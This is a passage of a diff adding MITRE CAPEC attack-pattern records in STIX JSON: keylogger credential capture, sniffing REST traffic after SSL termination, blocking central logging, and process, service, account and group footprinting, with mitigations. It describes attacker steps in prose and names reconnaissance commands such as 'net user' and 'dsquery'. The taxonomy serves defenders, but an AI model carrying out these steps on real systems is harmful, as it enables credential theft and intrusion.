"attack-pattern--e8f4c3d0-0aaf-4a96-b31c-9e6e8b5e15da", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Obtain Data via Utilities", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary deploys a keylogger in an effort to obtain credentials directly from a system's user. After capturing all the keystrokes made by a user, the adversary can analyze the data and determine which string are likely to be passwords or other credential related information.", + "external_references": [ + { + "external_id": "CAPEC-568", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/568.html" + }, + { + "description": "Input Capture:Keylogging", + "external_id": "T1056.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056/001" + } + ], + "id": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "modified": "2021-10-21T00:00:00.000Z", + "name": "Capture Credentials via Keylogger", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_follow_refs": [ + "attack-pattern--c8c9dfbe-7a40-4041-84ff-89942878a2f4" + ], + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a" + ], + "x_capec_domains": [ + "Software" + ], + 
"x_capec_execution_flow": "

Execution Flow

Explore

  1. Determine which user's credentials to capture: Since this is a more targeted attack, an adversary will first identify a particular user they wish the capture the credentials of.

Experiment

  1. Deploy keylogger: Once a user is identified, an adversary will deploy a keylogger to the user's system in one of many ways.

  2. Techniques
    Send a phishing email with a malicious attachment that installs a keylogger on a user's system
    Conceal a keylogger behind fake software and get the user to download the software
    Get a user to click on a malicious URL that directs them to a webpage that will install a keylogger without their knowledge
    Gain access to the user's system through a vulnerability and manually install a keylogger
  3. Record keystrokes: Once the keylogger is deployed on the user's system, the adversary will record keystrokes over a period of time.

  4. Analyze data and determine credentials: Using the captured keystrokes, the adversary will be able to determine the credentials of the user.

  5. Techniques
    Search for repeated sequences that are following by the enter key
    Search for repeated sequences that are not found in a dictionary
    Search for several backspaces in a row. This could indicate a mistyped password. The correct password can then be inferred using the whole key sequence

Exploit

  1. Use found credentials: After the adversary has found the credentials for the target user, they will then use them to gain access to a system in order to perform some follow-up attack

", + "x_capec_prerequisites": [ + "The ability to install the keylogger, either in person or remote." + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Strong physical security can help reduce the ability of an adversary to install a keylogger.", + "id": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "modified": "2021-10-21T00:00:00.000Z", + "name": "coa-568-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--76f04316-3bcf-4941-8aa8-df14017ac277", + "modified": "2021-10-21T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--ac31ad94-cdd7-4233-9c7b-3341818f95c1", + "target_ref": "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An attacker leverages a tool, device, or program to obtain specific information as provided by a user of the target system. This information is often needed by the attacker to launch a follow-on attack. This attack is different than Social Engineering as the adversary is not tricking or deceiving the user. Instead the adversary is putting a mechanism in place that captures the information that a user legitimately enters into a system. 
Deploying a keylogger, performing a UAC prompt, or wrapping the Windows default credential provider are all examples of such interactions.", + "external_references": [ + { + "external_id": "CAPEC-569", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/569.html" + }, + { + "description": "Input Capture", + "external_id": "T1056", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1056" + } + ], + "id": "attack-pattern--52103765-d380-42fc-aa4d-a8b24615548a", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Collect Data as Provided by Users", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--913426fa-ea1f-43b0-8492-1d363ea109d6" + ], + "x_capec_domains": [ + "Software" + ], + "x_capec_parent_of_refs": [ + "attack-pattern--fab7fb48-4503-4e03-980f-9bc827be929f" + ], + "x_capec_status": "Draft", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This attack utilizes a REST(REpresentational State Transfer)-style applications' trust in the system resources and environment to obtain sensitive data once SSL is terminated.", + "external_references": [ + { + "external_id": "CAPEC-57", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/57.html" + }, + { + "external_id": "CWE-300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/300.html" + }, + { + "external_id": "CWE-287", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/287.html" + }, + { + "external_id": "CWE-693", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/693.html" + }, + { + "description": "Network Sniffing", + "external_id": "T1040", + "source_name": "ATTACK", + "url": 
"https://attack.mitre.org/wiki/Technique/T1040" + } + ], + "id": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Utilizing REST's Trust in the System Resource to Obtain Sensitive Data", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--bdcdc784-d891-4ca8-847b-38ddca37a6ec" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_example_instances": [ + "The Rest service provider uses SSL to protect the communications between the service requester (client) to the service provider. In the instance where SSL is terminated before the communications reach the web server, it is very common in enterprise data centers to terminate SSL at a router, firewall, load balancer, proxy or other device, then the adversary can insert a sniffer into the communication stream and gather all the authentication tokens (such as session credentials, username/passwords combinations, and so on). The Rest service requester and service provider do not have any way to detect this attack." + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Find a REST-style application that uses SSL: The adversary must first find a REST-style application that uses SSL to target. Because this attack is easier to carry out from inside of a server network, it is likely that an adversary could have inside knowledge of how services operate.

Experiment

  1. Insert a listener to sniff client-server communication: The adversary inserts a listener that must exist beyond the point where SSL is terminated. This can be placed on the client side if it is believed that sensitive information is being sent to the client as a response, although most often the listener will be placed on the server side to listen for client authentication information.

  2. Techniques
    Run wireshark or tcpdump on a device that is on the inside of a firewall, load balancer, or router of a network and capture traffic after SSL has been terminated

Exploit

  1. Gather information passed in the clear: If developers have not hashed or encrypted data sent in the sniffed request, the adversary will be able to read this data in the clear. Most commonly, they will now have a username or password that they can use to submit requests to the web service just as an authorized user

", + "x_capec_extended_description": "\n Rest applications premise is that they leverage existing infrastructure to deliver web services functionality. An example of this is a Rest application that uses HTTP Get methods and receives a HTTP response with an XML document. These Rest style web services are deployed on existing infrastructure such as Apache and IIS web servers with no SOAP stack required.\n Unfortunately from a security standpoint, there frequently is no interoperable identity security mechanism deployed, so Rest developers often fall back to SSL to deliver security. In large data centers, SSL is typically terminated at the edge of the network - at the firewall, load balancer, or router. Once the SSL is terminated the HTTP request is in the clear (unless developers have hashed or encrypted the values, but this is rare). The adversary can utilize a sniffer such as Wireshark to snapshot the credentials, such as username and password that are passed in the clear once SSL is terminated. Once the adversary gathers these credentials, they can submit requests to the web service provider just as authorized user do. There is not typically an authentication on the client side, beyond what is passed in the request itself so once this is compromised, then this is generally sufficient to compromise the service's authentication scheme.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Opportunity to intercept must exist beyond the point where SSL is terminated.", + "The adversary must be able to insert a listener actively (proxying the communication) or passively (sniffing the communication) in the client-server communication path." 
+ ], + "x_capec_skills_required": { + "Low": "To insert a network sniffer or other listener into the communication stream" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "Very High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implementation: Implement message level security such as HMAC in the HTTP communication", + "id": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d6d23a13-264b-4642-b6ca-c39f175c9d9e", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--411ad2e6-57aa-4f31-be81-4e85c4618602", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Utilize defense in depth, do not rely on a single security mechanism like SSL", + "id": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-57-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d893b6fe-7c69-4a0a-a687-450db912f094", + "modified": 
"2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fab2d0ed-1d80-4531-a345-10e8bbb142d5", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8ca2309-7035-4c1b-91a7-0c39f533a82b", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a4112a44-a0f9-4bde-bebe-74ed96c4cd3f", + "target_ref": "attack-pattern--359d056e-6d5c-4d54-97d6-5a9f586bcccf", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "This CAPEC has been deprecated because it is not directly related to a weakness, social engineering, supply chains, or a physical-based attack.", + "external_references": [ + { + "external_id": "CAPEC-570", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/570.html" + } + ], + "id": "attack-pattern--80f16e35-c7c1-445d-8f12-a77bbbce6bcf", + "modified": "2020-07-30T00:00:00.000Z", + "name": "DEPRECATED: Signature-Based Avoidance", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_status": "Deprecated", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary prevents host-generated logs being delivered to a central location in an attempt to hide indicators of compromise.\n ", 
+ "external_references": [ + { + "external_id": "CAPEC-571", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/571.html" + }, + { + "description": "Impair Defenses: Disable Windows Event Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Impair Command History Logging", + "external_id": "T1562.002", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/002" + }, + { + "description": "Impair Defenses: Indicator Blocking", + "external_id": "T1562.006", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/006" + }, + { + "description": "Impair Defenses: Disable Cloud Logs", + "external_id": "T1562.008", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1562/008" + } + ], + "id": "attack-pattern--8f91fa23-b5c4-48f1-be6c-99582524f8cc", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Block Logging to Central Repository", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_domains": [ + "Communications", + "Software" + ], + "x_capec_extended_description": "\n In the case of network based reporting of indicators, an adversary may block traffic associated with reporting to prevent central station analysis. 
This may be accomplished by many means such as stopping a local process to creating a host-based firewall rule to block traffic to a specific server.\n In the case of local based reporting of indicators, an adversary may block delivery of locally-generated log files themselves to the central repository.\n ", + "x_capec_status": "Draft", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "\n An adversary modifies file contents by adding data to files for several reasons. Many different attacks could “follow” this pattern resulting in numerous outcomes. Adding data to a file could also result in a Denial of Service condition for devices with limited storage capacity.\n ", + "external_references": [ + { + "external_id": "CAPEC-572", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/572.html" + }, + { + "description": "Obfuscated Files or Information:Binary Padding", + "external_id": "T1027.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1027/001" + } + ], + "id": "attack-pattern--31b90554-68d8-4950-ac45-89c915a30716", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Artificially Inflate File Sizes", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--f8533ce1-5f23-4660-8f70-1a05af2c70d3" + ], + "x_capec_consequences": { + "Availability": [ + "Resource Consumption (Denial of Service)" + ], + "Integrity": [ + "Modify Data" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary could potentially increase file sizes on devices containing limited storage resources, such as SCADA or IOT devices, resulting in denial of service conditions.\n " + ], + 
"x_capec_likelihood_of_attack": "High", + "x_capec_parent_of_refs": [ + "attack-pattern--cbe9fd1f-4b5d-4a3c-b20b-e49888457338" + ], + "x_capec_status": "Draft", + "x_capec_typical_severity": "Medium", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the currently running processes on the target system to an authorized user. By knowing what processes are running on the target system, the adversary can learn about the target environment as a means towards further malicious behavior.", + "external_references": [ + { + "external_id": "CAPEC-573", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/573.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Process Discovery", + "external_id": "T1057", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1057" + } + ], + "id": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Process Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "On a Windows system, the command, \"tasklist,\" displays information about processes. 
The same function on a Mac OS system is done with the command, \"ps.\"", + "In addition to manual discovery of running processes, an adversary can develop malware that carries out this attack pattern before subsequent malicious action." + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." + ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--d90ebca8-a2a7-44f1-afb0-5bf198b230a1", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--df51abec-081d-46dd-8f72-6ffd3d11d3dc", + "target_ref": "attack-pattern--b5b3a4ff-afa0-4a3a-9537-88ac953a41f7", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the services on the target system to an authorized user. By knowing what services are registered on the target system, the adversary can learn about the target environment as a means towards further malicious behavior. 
Depending on the operating system, commands that can obtain services information include \"sc\" and \"tasklist/svc\" using Tasklist, and \"net start\" using Net.", + "external_references": [ + { + "external_id": "CAPEC-574", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/574.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Service Discovery", + "external_id": "T1007", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1007" + } + ], + "id": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Services Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire service information and block them by using a software restriction policy or tools that restrict program execution by uaing a process allowlist.", + "id": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-574-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ae71c8b1-867e-4d0f-b856-1f1dc4334311", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--93c5a458-1b46-4c3f-9f1f-763513e4e117", + "target_ref": "attack-pattern--6cfc4047-a0fb-42ac-bf94-226a21c40c80", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the domain accounts and their permissions on the target system to an authorized user. By knowing what accounts are registered on the target system, the adversary can inform further and more targeted malicious behavior. 
Example Windows commands which can acquire this information are: \"net user\" and \"dsquery\".", + "external_references": [ + { + "external_id": "CAPEC-575", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/575.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Account Discovery", + "external_id": "T1087", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1087" + } + ], + "id": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "modified": "2020-07-30T00:00:00.000Z", + "name": "Account Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs that may be used to acquire account information and block them by using a software restriction policy or tools that restrict program execution by uysing a process allowlist.", + "id": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "modified": "2020-07-30T00:00:00.000Z", + "name": "coa-575-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a83980a6-7bad-41f4-967c-54f888a25a11", + "modified": "2020-07-30T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--99081e9b-3b17-47c0-bbc3-23ef66bd5063", + "target_ref": "attack-pattern--6de257d8-e3b6-4654-85a7-a6fb37a94ccb", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about user groups and their permissions on the target system to an authorized user. By knowing what users/permissions are registered on the target system, the adversary can inform further and more targeted malicious behavior. 
An example Windows command which can list local groups is \"net localgroup\".", + "external_references": [ + { + "external_id": "CAPEC-576", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/576.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "Permission Groups Discovery", + "external_id": "T1069", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1069" + }, + { + "description": "Group Policy Discovery", + "external_id": "T1615", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1615" + } + ], + "id": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Group Permission Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack." 
+ ], + "x_capec_status": "Stable", + "x_capec_typical_severity": "Low", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Identify programs (such as \"net\") that may be used to enumerate local group permissions and block them by using a software restriction Policy or tools that restrict program execution by using a process allowlist.", + "id": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-576-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--66551e96-dd41-445e-855d-1b22ca5c0267", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--2bb92dd6-4286-42f9-bb33-e90bf1a8a9d5", + "target_ref": "attack-pattern--f95027a2-27e7-431f-b5c7-da9c46b05f71", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2015-11-09T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary exploits functionality meant to identify information about the primary users on the target system to an authorized user. They may do this, for example, by reviewing logins or file modification times. By knowing what owners use the target system, the adversary can inform further and more targeted malicious behavior. An example Windows command that may accomplish this is \"dir /A ntuser.dat\". Which will display the last modified time of a user's ntuser.dat file when run within the root folder of a user. 
This time is synonymous with the last time that user was logged in.", + "external_references": [ + { + "external_id": "CAPEC-577", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/577.html" + }, + { + "external_id": "CWE-200", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/200.html" + }, + { + "description": "System Owner/User Discovery", + "external_id": "T1033", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1033" + } + ], + "id": "attack-pattern--3dfa08af-9677-4a4d-a3f0-a1c5042c9497", + "modified": "2019-09-30T00:00:00.000Z", + "name": "Owner Footprinting", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--87b0d2df-b246-4bf9-aee8-4912e2fa1a30" + ], + "x_capec_consequences": { + "Access_Control": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Authorization": [ + "Bypass Protection Mechanism", + "Hide Activities" + ], + "Confidentiality": [ + "Other", + "Bypass Protection Mechanism", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_likelihood_of_attack": "Low", + "x_capec_prerequisites": [ + "The adversary must have gained access to the target system via physical or logical means in order to carry out this attack.", + "Administrator permissions are required to view the home folder of other users." 
